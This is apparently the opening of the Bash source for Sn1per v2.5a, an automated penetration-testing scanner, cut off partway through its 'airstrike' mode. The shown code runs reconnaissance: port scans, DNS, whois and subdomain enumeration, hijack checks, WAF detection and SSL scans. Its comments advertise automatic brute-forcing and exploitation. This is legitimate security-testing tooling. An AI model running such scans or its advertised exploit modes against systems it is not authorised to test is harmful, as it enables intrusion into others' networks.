1607 lines
77 KiB
Bash
1607 lines
77 KiB
Bash
#!/bin/bash
|
|
# + -- --=[Sn1per by 1N3
|
|
# + -- --=[http://crowdshield.com
|
|
#
|
|
## ABOUT:
|
|
#Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities.
|
|
|
|
## DEMO VIDEO:
|
|
#[](https://www.youtube.com/watch?v=nA_V_u3QZA4)
|
|
|
|
## FEATURES:
|
|
#* Automatically collects basic recon (ie. whois, ping, DNS, etc.)
|
|
#* Automatically launches Google hacking queries against a target domain
|
|
#* Automatically enumerates open ports via NMap port scanning
|
|
#* Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
|
|
#* Automatically checks for sub-domain hijacking
|
|
#* Automatically runs targeted NMap scripts against open ports
|
|
#* Automatically runs targeted Metasploit scan and exploit modules
|
|
#* Automatically scans all web applications for common vulnerabilities
|
|
#* Automatically brute forces ALL open services
|
|
#* Automatically test for anonymous FTP access
|
|
#* Automatically runs WPScan, Arachni and Nikto for all web services
|
|
#* Automatically enumerates NFS shares
|
|
#* Automatically test for anonymous LDAP access
|
|
#* Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities
|
|
#* Automatically enumerate SNMP community strings, services and users
|
|
#* Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067
|
|
#* Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers
|
|
#* Automatically tests for open X11 servers
|
|
#* Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
|
|
#* Performs high level enumeration of multiple hosts and subnets
|
|
#* Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
|
|
#* Automatically gathers screenshots of all web sites
|
|
#* Create individual workspaces to store all scan output
|
|
|
|
## KALI LINUX INSTALL:
|
|
#```
|
|
#./install.sh
|
|
#```
|
|
|
|
## DOCKER INSTALL:
|
|
|
|
#Docker Install:
|
|
#https://github.com/menzow/sn1per-docker
|
|
|
|
#Docker Build:
|
|
#https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/
|
|
|
|
#Example usage:
|
|
#```
|
|
#$ docker pull menzo/sn1per-docker
|
|
#$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io
|
|
#```
|
|
|
|
## USAGE:
|
|
#```
|
|
#sniper <target> <report>
|
|
#sniper <target> stealth <report>
|
|
#sniper <CIDR> discover
|
|
#sniper <target> port <portnum>
|
|
#sniper <target> fullportonly <portnum>
|
|
#sniper <target> web <report>
|
|
#sniper <target> nobrute <report>
|
|
#sniper <targets.txt> airstrike <report>
|
|
#sniper <targets.txt> nuke <report>
|
|
#sniper loot
|
|
#```
|
|
|
|
### MODES:
|
|
#* **REPORT:** Outputs all results to text in the loot directory for later reference. To enable reporting, append 'report' to any sniper mode or command.
|
|
#* **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
|
|
#* **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
|
|
#* **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
|
|
#* **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.
|
|
#* **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
|
|
#* **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services.
|
|
#* **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
|
|
#* **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
|
|
#* **LOOT:** Automatically organizes and displays loot folder in your browser and opens Metasploit Pro and Zenmap GUI with all port scan results. To run, type 'sniper loot'.
|
|
|
|
## SAMPLE REPORT:
|
|
# https://gist.github.com/1N3/8214ec2da2c91691bcbc
|
|
|
|
VER="2.5a"
|
|
TARGET="$1"
|
|
MODE="$2"
|
|
OPT1="$3"
|
|
DISABLE_POSTGRESQL="true" # disabling postgresql startup, assuming it's running already
|
|
INSTALL_DIR="/usr/share/sniper"
|
|
LOOT_DIR="/usr/share/sniper/loot"
|
|
PLUGINS_DIR="/usr/share/sniper/plugins"
|
|
CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"
|
|
SAMRDUMP="/usr/share/sniper/bin/samrdump.py"
|
|
DNSDICT6="/usr/share/sniper/bin/dnsdict6"
|
|
INURLBR="/usr/share/sniper/bin/inurlbr.php"
|
|
USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
|
|
PASS_FILE="/usr/share/brutex/wordlists/password.lst"
|
|
DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
|
|
SUPER_MICRO_SCAN="/usr/share/sniper/plugins/SuperMicro-Password-Scanner/supermicro_scan.sh"
|
|
DEFAULT_PORTS="21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,623,624,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,16992,27017,27018,27019,28017,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
|
|
DEFAULT_TCP_PORTS="21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,623,624,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,16992,27017,27018,27019,28017,49152"
|
|
DEFAULT_UDP_PORTS="53,67,68,88,161,162,137,138,139,389,520,2049"
|
|
THREADS="30"
|
|
OKBLUE='\033[94m'
|
|
OKRED='\033[91m'
|
|
OKGREEN='\033[92m'
|
|
OKORANGE='\033[93m'
|
|
RESET='\e[0m'
|
|
REGEX='^[0-9]+$'
|
|
|
|
# ENABLE/DISABLE AUTOMATIC BRUTE FORCE
|
|
# DEFAULT IS "1" (ENABLED)
|
|
AUTOBRUTE="1"
|
|
|
|
# ENABLE/DISABLE FULL DETAILED NMAP SCAN
|
|
# DEFAULT IS "1" (ENABLED)
|
|
FULLNMAPSCAN="1"
|
|
|
|
# ENABLE/DISABLE AUTOMATIC GOOGLE HACKING QUERIES
|
|
# DEFAULT IS "1" (ENABLED)
|
|
GOOHAK="1"
|
|
|
|
# ENABLE AUTO UPDATES
|
|
# DEFAULT IS "1" (ENABLED)
|
|
ENABLE_AUTO_UPDATES="1"
|
|
|
|
cd $INSTALL_DIR
|
|
|
|
function check_update {
|
|
if [ "$ENABLE_AUTO_UPDATES" = "1" ]; then
|
|
# echo -e "$OKBLUE + -- --=[Checking for updates...$RESET"
|
|
LATEST_VER="$(curl -s https://crowdshield.com/.injectx/sniper_ver.txt)"
|
|
if [ "$LATEST_VER" != "$VER" ]; then
|
|
echo -e "$OKRED + -- --=[Sn1per $LATEST_VER is available to download... Do you want to update? (y or n)$RESET"
|
|
read ans
|
|
if [ "$ans" = "y" ]; then
|
|
rm -Rf /tmp/Sn1per/ 2>/dev/null
|
|
git clone https://github.com/1N3/Sn1per /tmp/Sn1per/
|
|
bash /tmp/Sn1per/install.sh
|
|
rm -Rf /tmp/Sn1per/ 2>/dev/null
|
|
exit
|
|
fi
|
|
fi
|
|
fi
|
|
}
|
|
|
|
function init {
|
|
mkdir -p $LOOT_DIR 2> /dev/null
|
|
mkdir $LOOT_DIR/domains 2> /dev/null
|
|
mkdir $LOOT_DIR/screenshots 2> /dev/null
|
|
mkdir $LOOT_DIR/nmap 2> /dev/null
|
|
mkdir $LOOT_DIR/reports 2> /dev/null
|
|
mkdir $LOOT_DIR/output 2> /dev/null
|
|
TARGET="$(echo $TARGET | sed 's/https:\/\///g' | sed 's/http:\/\///g')"
|
|
}
|
|
|
|
function loot {
|
|
echo -e "$OKRED ____ $RESET"
|
|
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
|
|
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
|
|
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
|
|
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
|
echo -e "$OKRED /_/ $RESET"
|
|
echo ""
|
|
echo -e "$OKORANGE + -- --=[Current workspaces...$RESET"
|
|
cd $LOOT_DIR
|
|
ls -lh $LOOT_DIR/workspace/
|
|
echo -e "$OKORANGE + -- --=[Enter a name for the workspace:$RESET"
|
|
read WORKSPACE
|
|
if [ -z $WORKSPACE ]; then
|
|
WORKSPACE="default"
|
|
fi
|
|
mkdir -p $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null
|
|
echo -e "$OKORANGE + -- --=[Generating reports...$RESET"
|
|
for a in `ls sniper-*.txt 2>/dev/null`;
|
|
do
|
|
# HTML OUTPUT
|
|
echo "$a" | aha --black > $LOOT_DIR/reports/$a.html
|
|
cat "$a" | aha --black >> $LOOT_DIR/reports/$a.html
|
|
# TEXT OUTPUT DISABLED
|
|
#echo "$a" | aha --black > $LOOT_DIR/reports/$a
|
|
#sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
|
|
# CONSOLE OUTPUT
|
|
mv $a $LOOT_DIR/output/
|
|
done
|
|
echo -e "$OKORANGE + -- --=[Removing blank web screenshots...$RESET"
|
|
find /usr/share/sniper/loot/screenshots/ -size -10k -exec rm -f {} \; 2> /dev/null
|
|
rm -f $LOOT_DIR/.fuse_* 2> /dev/null
|
|
echo -e "$OKORANGE + -- --=[Starting Metasploit service...$RESET"
|
|
/etc/init.d/metasploit start 2> /dev/null
|
|
if [ -z $DISABLE_POSTGRESQL ]; then /etc/init.d/postgresql start 2> /dev/null; fi
|
|
echo -e "$OKORANGE + -- --=[Importing NMap XML files into Metasploit...$RESET"
|
|
msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;"
|
|
echo -e "$OKORANGE + -- --=[Copying loot to workspace: $WORKSPACE...$RESET"
|
|
cp -Rf $LOOT_DIR/screenshots/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
|
|
cp -Rf $LOOT_DIR/nmap/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
|
|
cp -Rf $LOOT_DIR/domains/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
|
|
cp -Rf $LOOT_DIR/output/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
|
|
cp -Rf $LOOT_DIR/reports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
|
|
cp -Rf $LOOT_DIR/imports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
|
|
cp -Rf $LOOT_DIR/notes/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
|
|
cp -Rf $LOOT_DIR/web/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
|
|
rm -Rf $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ 2> /dev/null
|
|
mkdir $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ -p 2> /dev/null
|
|
echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET"
|
|
iceweasel 2> /dev/null &
|
|
sleep 2
|
|
iceweasel $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null &
|
|
sleep 2
|
|
echo -e "$OKORANGE + -- --=[Launching Metasploit Pro Web UI...$RESET"
|
|
iceweasel http://localhost:3001/login 2> /dev/null &
|
|
echo -e "$OKORANGE + -- --=[Launching Zenmap...$RESET"
|
|
zenmap -f $LOOT_DIR/workspace/$WORKSPACE/nmap/ 2> /dev/null &
|
|
echo -e "$OKORANGE + -- --=[Done!$RESET"
|
|
}
|
|
|
|
function help {
|
|
echo -e "$OKRED ____ $RESET"
|
|
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
|
|
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
|
|
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
|
|
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
|
echo -e "$OKRED /_/ $RESET"
|
|
echo ""
|
|
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
|
|
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
|
|
echo -e "$OKORANGE + -- --=[Usage:"
|
|
echo ""
|
|
echo ' [*] sniper <target> <report>'
|
|
echo ' [*] sniper <target> stealth <report>'
|
|
echo ' [*] sniper <CIDR> discover'
|
|
echo ' [*] sniper <target> port <portnum>'
|
|
echo ' [*] sniper <target> fullportonly <portnum>'
|
|
echo ' [*] sniper <target> web <report>'
|
|
echo ' [*] sniper <target> nobrute <report>'
|
|
echo ' [*] sniper <targets.txt> airstrike <report>'
|
|
echo ' [*] sniper <targets.txt> nuke <report>'
|
|
echo ' [*] sniper loot'
|
|
echo ""
|
|
echo ' + -- --=[Modes:'
|
|
echo ''
|
|
echo ' + -- --=[REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append report to any sniper mode or command.'
|
|
echo ' + -- --=[STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking'
|
|
echo ' + -- --=[DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.'
|
|
echo ' + -- --=[PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.'
|
|
echo ' + -- --=[WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.'
|
|
echo ' + -- --=[NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.'
|
|
echo ' + -- --=[AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.'
|
|
echo ' + -- --=[NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.'
|
|
echo -e " + -- --=[LOOT: Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type sniper loot.$RESET"
|
|
echo ""
|
|
echo ""
|
|
}
|
|
|
|
if [ -z $TARGET ]; then
|
|
echo -e "$OKRED ____ $RESET"
|
|
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
|
|
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
|
|
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
|
|
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
|
echo -e "$OKRED /_/ $RESET"
|
|
echo -e ""
|
|
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
|
|
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
|
|
echo -e "$OKORANGE + -- --=[Usage: sniper <target>$RESET"
|
|
echo ""
|
|
exit
|
|
fi
|
|
|
|
if [[ $TARGET = "--help" ]]; then
|
|
help
|
|
exit
|
|
fi
|
|
|
|
if [[ ${TARGET:0:1} =~ $REGEX ]];
|
|
then
|
|
SCAN_TYPE="IP"
|
|
else
|
|
SCAN_TYPE="DOMAIN"
|
|
fi
|
|
|
|
# INITILIZE()
|
|
init
|
|
|
|
# CHECK FOR UPDATES
|
|
check_update
|
|
|
|
if [ "$MODE" = "report" ]; then
|
|
sniper $TARGET | tee $LOOT_DIR/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
|
|
exit
|
|
fi
|
|
|
|
if [ "$TARGET" = "loot" ]; then
|
|
loot
|
|
exit
|
|
fi
|
|
|
|
if [ "$MODE" = "discover" ]; then
|
|
echo -e "$OKRED ____ /\\"
|
|
echo -e "$OKRED Sn1per by 1N3 @CrowdShield \ \\"
|
|
echo -e "$OKRED https://crowdshield.com \ \\"
|
|
echo -e "$OKRED ___ / \\"
|
|
echo -e "$OKRED \ \\"
|
|
echo -e "$OKRED === > [ \\"
|
|
echo -e "$OKRED / \ \\"
|
|
echo -e "$OKRED \ / /"
|
|
echo -e "$OKRED === > [ /"
|
|
echo -e "$OKRED / /"
|
|
echo -e "$OKRED ___ \ /"
|
|
echo -e "$OKRED / /"
|
|
echo -e "$OKRED ____ / /"
|
|
echo -e "$OKRED \/$RESET"
|
|
echo ""
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Ping Discovery Scan]=------------- -- +$RESET"
|
|
nmap -sP $TARGET | grep ' for ' | awk '{print $5}' | tee $LOOT_DIR/domains/sniper-ping-ips.txt
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET"
|
|
arp -a -n | tee $LOOT_DIR/domains/sniper-arp-ips.txt
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running TCP Port Discovery Scan]=--------- -- +$RESET"
|
|
unicornscan -p $DEFAULT_TCP_PORTS $TARGET 2>/dev/null | tee $LOOT_DIR/domains/sniper-tcp-ports.txt
|
|
cat $LOOT_DIR/domains/sniper-tcp-ports.txt | awk '{print $6}' | sort -u | tee $LOOT_DIR/domains/sniper-tcp-ips.txt
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running UDP Port Discovery Scan]=--------- -- +$RESET"
|
|
unicornscan -m U -p $DEFAULT_UDP_PORTS $TARGET 2>/dev/null | tee $LOOT_DIR/domains/sniper-udp-ports.txt
|
|
cat $LOOT_DIR/domains/sniper-udp-ports.txt | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-udp-ips.txt
|
|
echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET"
|
|
cat $LOOT_DIR/domains/sniper-ping-ips.txt $LOOT_DIR/domains/sniper-tcp-ips.txt $LOOT_DIR/domains/sniper-udp-ips.txt > $LOOT_DIR/domains/sniper-ips-unsorted.txt
|
|
sort -u $LOOT_DIR/domains/sniper-ips-unsorted.txt > $LOOT_DIR/domains/sniper-ips.txt
|
|
cat $LOOT_DIR/domains/sniper-ips.txt
|
|
echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET"
|
|
echo ""
|
|
if [ "$OPT1" = "report" ]; then
|
|
for a in `cat $LOOT_DIR/domains/sniper-ips.txt`
|
|
do sniper $a report
|
|
done
|
|
exit
|
|
fi
|
|
for a in `cat $LOOT_DIR/domains/sniper-ips.txt`
|
|
do sniper $a
|
|
done
|
|
exit
|
|
fi
|
|
|
|
if [ "$MODE" = "web" ]; then
|
|
if [ "$OPT1" = "report" ]; then
|
|
sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
|
loot
|
|
exit
|
|
fi
|
|
fi
|
|
|
|
if [ "$MODE" = "stealth" ]; then
|
|
if [ "$OPT1" = "report" ]; then
|
|
sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
|
exit
|
|
fi
|
|
echo -e "$OKRED ____ $RESET"
|
|
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
|
|
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
|
|
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
|
|
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
|
echo -e "$OKRED /_/ $RESET"
|
|
echo -e "$RESET"
|
|
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
|
|
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
|
|
echo -e "$OKRED "
|
|
echo -e "$OKRED ./\."
|
|
echo -e "$OKRED ./ '\."
|
|
echo -e "$OKRED \. '\."
|
|
echo -e "$OKRED '\. '\."
|
|
echo -e "$OKRED '\. '\."
|
|
echo -e "$OKRED '\. '\."
|
|
echo -e "$OKRED ./ '\."
|
|
echo -e "$OKRED ./ ____'\."
|
|
echo -e "$OKRED ./ < '\."
|
|
echo -e "$OKRED \-------\ '> '\."
|
|
echo -e "$OKRED '\=====> ___< '\."
|
|
echo -e "$OKRED ./-----/ __________'\."
|
|
echo -e "$OKRED "' \.------\ _____ ___(_)(_\."\'
|
|
echo -e "$OKRED '\=====> < ./'"
|
|
echo -e "$OKRED ./-----/ '> ./"
|
|
echo -e "$OKRED \. ___< ./"
|
|
echo -e "$OKRED '\. ./"
|
|
echo -e "$OKRED '\. ./"
|
|
echo -e "$OKRED '\. ./"
|
|
echo -e "$OKRED ./ ./"
|
|
echo -e "$OKRED ./ ./ Carl Pilcher"
|
|
echo -e "$OKRED ./ ./"
|
|
echo -e "$OKRED ./ ./"
|
|
echo -e "$OKRED ./ ./"
|
|
echo -e "$OKRED \. ./"
|
|
echo -e "$OKRED '\. ./"
|
|
echo -e "$OKRED '\/"
|
|
echo -e "$RESET"
|
|
echo -e "$OKORANGE + -- --=[Launching stealth scan: $TARGET $RESET"
|
|
echo -e "$OKGREEN $RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
|
|
nslookup $TARGET
|
|
host $TARGET
|
|
if [ $SCAN_TYPE == "DOMAIN" ];
|
|
then
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET"
|
|
whois $TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET"
|
|
theharvester -d $TARGET -l 100 -b bing 2> /dev/null
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
|
|
dig -x $TARGET
|
|
dnsenum $TARGET
|
|
mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
|
|
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
|
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
|
echo ""
|
|
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
|
|
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
|
|
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
|
|
echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
|
|
echo -e "$OKBLUE"
|
|
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
|
|
echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
|
|
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
|
|
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
|
|
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
|
|
rm -f /tmp/curl.out 2> /dev/null
|
|
echo -e "$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
|
|
for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus" 2>/dev/null; done;
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
|
|
python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
|
|
fi
|
|
echo ""
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
|
|
nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
|
|
|
|
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|
|
|
if [ -z "$port_80" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
|
|
wafw00f http://$TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
|
|
whatweb http://$TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
|
|
xsstracer $TARGET 80
|
|
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
|
|
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg
|
|
fi
|
|
|
|
if [ -z "$port_443" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
|
|
wafw00f https://$TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
|
|
whatweb https://$TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
|
|
xsstracer $TARGET 443
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
|
|
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
|
|
sslscan --no-failed $TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
|
|
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg
|
|
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/$TARGET-port443.jpg"
|
|
fi
|
|
|
|
echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
echo -e ""
|
|
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
|
exit
|
|
fi
|
|
|
|
if [ "$MODE" = "airstrike" ]; then
|
|
if [ "$OPT1" = "report" ]; then
|
|
sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
|
exit
|
|
fi
|
|
echo -e "$OKRED ____ $RESET"
|
|
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
|
|
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
|
|
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
|
|
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
|
echo -e "$OKRED /_/ $RESET"
|
|
echo -e "$RESET"
|
|
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
|
|
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
|
|
|
|
for a in `cat $TARGET`;
|
|
do
|
|
echo -e "$OKRED |"
|
|
echo -e "$OKRED | |"
|
|
echo -e "$OKRED | -/_\-"
|
|
echo -e "$OKRED -/_\- ______________(/ . \)______________"
|
|
echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
|
|
echo -e "$OKRED <> \___/ <> <>"
|
|
echo -e "$OKRED "
|
|
echo -e "$OKRED ||"
|
|
echo -e "$OKRED <>"
|
|
echo -e "$OKRED ||"
|
|
echo -e "$OKRED <>"
|
|
echo -e "$OKRED ||"
|
|
echo -e "$OKRED || BIG"
|
|
echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
|
|
echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
|
|
echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
|
|
echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
|
|
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
|
|
echo -e "$OKRED | ||. | | | ||| |||||"
|
|
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
|
|
echo -e "$OKRED | ||. | | | ||| |||||"
|
|
echo -e "$OKRED __________________________________________________________"
|
|
echo -e "$OKRED Bomb raid (contributed by Michael aka SNOOPY@DRYCAS.CLUB.CC.CMU.EDU)"
|
|
echo -e "$RESET"
|
|
echo -e "$OKORANGE + -- --=[Launching airstrike: $a $RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
|
|
nslookup $a
|
|
host $a
|
|
